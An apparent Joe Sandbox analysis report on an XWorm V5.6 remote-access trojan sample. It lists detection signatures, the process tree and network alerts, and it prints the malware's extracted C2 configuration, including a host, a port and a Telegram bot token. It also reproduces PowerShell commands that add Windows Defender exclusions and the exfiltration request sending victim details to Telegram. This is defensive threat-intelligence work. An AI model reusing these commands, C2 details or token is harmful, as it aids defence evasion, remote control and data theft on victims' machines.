Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NzEsfIiAc0.exe

Overview

General Information

Sample name:NzEsfIiAc0.exe
renamed because original name is a hash value
Original sample name:0b80b6d2e6b7330c1f917dc01d612f6f314630edc8d05f3831689865990dcba5.exe
Analysis ID:1512625
MD5:bfdf788a451cf345e09e7646734f4666
SHA1:0729903458944361b593ee6ef120de0eca8913b3
SHA256:0b80b6d2e6b7330c1f917dc01d612f6f314630edc8d05f3831689865990dcba5
Tags:96-9-226-111exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • NzEsfIiAc0.exe (PID: 3576 cmdline: "C:\Users\user\Desktop\NzEsfIiAc0.exe" MD5: BFDF788A451CF345E09E7646734F4666)
    • powershell.exe (PID: 1280 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NzEsfIiAc0.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["paul-vocational.gl.at.ply.gg"], "Port": "56417", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=6378619811"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
NzEsfIiAc0.exeJoeSecurity_XWormYara detected XWormJoe Security
    NzEsfIiAc0.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      NzEsfIiAc0.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x87f3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8890:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x89a5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x84a1:$cnc4: POST / HTTP/1.1

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Roaming\XClient.exeJoeSecurity_XWormYara detected XWormJoe Security
          C:\Users\user\AppData\Roaming\XClient.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            C:\Users\user\AppData\Roaming\XClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x87f3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x8890:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x89a5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x84a1:$cnc4: POST / HTTP/1.1

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x85f3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x8690:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x87a5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x82a1:$cnc4: POST / HTTP/1.1
              Process Memory Space: NzEsfIiAc0.exe PID: 3576JoeSecurity_XWormYara detected XWormJoe Security
                Process Memory Space: NzEsfIiAc0.exe PID: 3576JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.NzEsfIiAc0.exe.260000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    0.0.NzEsfIiAc0.exe.260000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      0.0.NzEsfIiAc0.exe.260000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0x87f3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0x8890:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0x89a5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0x84a1:$cnc4: POST / HTTP/1.1

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NzEsfIiAc0.exe", ParentImage: C:\Users\user\Desktop\NzEsfIiAc0.exe, ParentProcessId: 3576, ParentProcessName: NzEsfIiAc0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', ProcessId: 1280, ProcessName: powershell.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NzEsfIiAc0.exe", ParentImage: C:\Users\user\Desktop\NzEsfIiAc0.exe, ParentProcessId: 3576, ParentProcessName: NzEsfIiAc0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', ProcessId: 1280, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NzEsfIiAc0.exe", ParentImage: C:\Users\user\Desktop\NzEsfIiAc0.exe, ParentProcessId: 3576, ParentProcessName: NzEsfIiAc0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', ProcessId: 1280, ProcessName: powershell.exe
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\NzEsfIiAc0.exe, ProcessId: 3576, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NzEsfIiAc0.exe", ParentImage: C:\Users\user\Desktop\NzEsfIiAc0.exe, ParentProcessId: 3576, ParentProcessName: NzEsfIiAc0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', ProcessId: 1280, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-17T17:26:33.365190+020028536851A Network Trojan was detected192.168.2.649719149.154.167.220443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-17T17:27:10.017016+020028559241Malware Command and Control Activity Detected192.168.2.649724147.185.221.2156417TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: NzEsfIiAc0.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\XClient.exeAvira: detection malicious, Label: TR/Spy.Gen
                      Found malware configuration
                      Source: NzEsfIiAc0.exeMalware Configuration Extractor: Xworm {"C2 url": ["paul-vocational.gl.at.ply.gg"], "Port": "56417", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=6378619811"}
                      Source: NzEsfIiAc0.exe.3576.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\XClient.exeReversingLabs: Detection: 81%
                      Multi AV Scanner detection for submitted file
                      Source: NzEsfIiAc0.exeReversingLabs: Detection: 81%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\XClient.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: NzEsfIiAc0.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: NzEsfIiAc0.exeString decryptor: paul-vocational.gl.at.ply.gg
                      Source: NzEsfIiAc0.exeString decryptor: 56417
                      Source: NzEsfIiAc0.exeString decryptor: <123456789>
                      Source: NzEsfIiAc0.exeString decryptor: <Xwormmm>
                      Source: NzEsfIiAc0.exeString decryptor: XWorm V5.6
                      Source: NzEsfIiAc0.exeString decryptor: USB.exe
                      Source: NzEsfIiAc0.exeString decryptor: %AppData%
                      Source: NzEsfIiAc0.exeString decryptor: XClient.exe
                      Source: NzEsfIiAc0.exeString decryptor: 7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA
                      Source: NzEsfIiAc0.exeString decryptor: 6378619811
                      Source: NzEsfIiAc0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49719 version: TLS 1.2
                      Source: NzEsfIiAc0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49724 -> 147.185.221.21:56417
                      Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.6:49719 -> 149.154.167.220:443
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: paul-vocational.gl.at.ply.gg
                      Connects to many ports of the same IP (likely port scanning)
                      Source: global trafficTCP traffic: 147.185.221.21 ports 1,4,5,6,7,56417
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: NzEsfIiAc0.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.NzEsfIiAc0.exe.260000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.6:49721 -> 147.185.221.21:56417
                      Source: global trafficHTTP traffic detected: GET /bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=6378619811&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF248E435BF45453C730E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20AFXDXR%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 147.185.221.21 147.185.221.21
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=6378619811&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF248E435BF45453C730E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20AFXDXR%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: global trafficDNS traffic detected: DNS query: paul-vocational.gl.at.ply.gg
                      Source: powershell.exe, 00000002.00000002.2242258397.000001535A9AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                      Source: powershell.exe, 00000005.00000002.2347323496.0000019224955000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2686027389.000002DDB9CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                      Source: powershell.exe, 00000005.00000002.2347323496.0000019224955000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2686027389.000002DDB9CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                      Source: powershell.exe, 00000002.00000002.2235529090.000001535232F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2330121656.000001921C08F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2470760532.000001A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.2219535625.00000153424E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C24A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: NzEsfIiAc0.exe, 00000000.00000002.3398807333.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2219535625.00000153422C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA1691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000002.00000002.2219535625.00000153424E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C24A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000002.00000002.2242258397.000001535A9AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2347323496.0000019224955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: powershell.exe, 00000002.00000002.2219535625.00000153422C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA1691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: NzEsfIiAc0.exe, 00000000.00000002.3398807333.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: NzEsfIiAc0.exe, XClient.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                      Source: NzEsfIiAc0.exe, 00000000.00000002.3398807333.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=63786
                      Source: powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 0000000D.00000002.2690372644.000002DDB9EB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nt.C
                      Source: powershell.exe, 00000002.00000002.2235529090.000001535232F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2330121656.000001921C08F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2470760532.000001A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49719 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: NzEsfIiAc0.exe, XLogger.cs.Net Code: KeyboardLayout
                      Source: XClient.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout

                      Operating System Destruction

                      barindex
                      Protects its processes via BreakOnTermination flag
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess information set: 01 00 00 00 Jump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: NzEsfIiAc0.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.0.NzEsfIiAc0.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeCode function: 0_2_00007FFD347770B60_2_00007FFD347770B6
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeCode function: 0_2_00007FFD347705B80_2_00007FFD347705B8
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeCode function: 0_2_00007FFD34777E620_2_00007FFD34777E62
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeCode function: 0_2_00007FFD347739820_2_00007FFD34773982
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347A8E052_2_00007FFD347A8E05
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347A56EA2_2_00007FFD347A56EA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347A8F4A2_2_00007FFD347A8F4A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD347885035_2_00007FFD34788503
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34788EFA5_2_00007FFD34788EFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34789EFB5_2_00007FFD34789EFB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34785EFA5_2_00007FFD34785EFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3478ABF25_2_00007FFD3478ABF2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3478B8285_2_00007FFD3478B828
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34779EF310_2_00007FFD34779EF3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3477947D10_2_00007FFD3477947D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34778E2C10_2_00007FFD34778E2C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD347756EA10_2_00007FFD347756EA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3477AB1510_2_00007FFD3477AB15
